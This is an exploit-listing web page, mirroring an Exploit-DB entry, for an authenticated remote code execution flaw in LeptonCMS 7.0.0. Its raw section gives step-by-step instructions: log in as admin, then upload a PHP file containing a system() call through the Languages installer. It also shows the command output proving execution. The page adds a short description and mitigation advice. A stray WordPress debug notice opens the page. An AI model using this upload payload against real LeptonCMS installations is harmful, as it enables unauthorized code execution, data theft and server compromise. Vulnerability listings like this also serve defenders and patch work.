Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) - exploit.company
header-logo
Suggest Exploit
vendor:
LeptonCMS
by:
tmrswrr
6.1
CVSS
HIGH
Remote Code Execution (RCE)
94
CWE
Product Name: LeptonCMS
Affected Version From: 7.0.0
Affected Version To: 7.0.0
Patch Exists: NO
Related CWE:
CPE: a:lepton-cms:lepton:7.0.0
Metasploit:
Other Scripts:
Platforms Tested: Web
2024

LeptonCMS 7.0.0 – Remote Code Execution (RCE) (Authenticated)

By uploading a malicious PHP file in the Languages section of LeptonCMS 7.0.0, an authenticated attacker can execute arbitrary code on the server. This can lead to unauthorized access, data theft, or further compromise of the system. This vulnerability has not been assigned a CVE at the time of writing.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict file upload permissions, sanitize user inputs, and keep the CMS system updated to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2024-1-19
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.lepton-cms.com/
# Version : 7.0.0

1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php
2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php
3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>
4 ) After click install you will be see result

# Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Navigation

Suggest Exploit

Services By CQR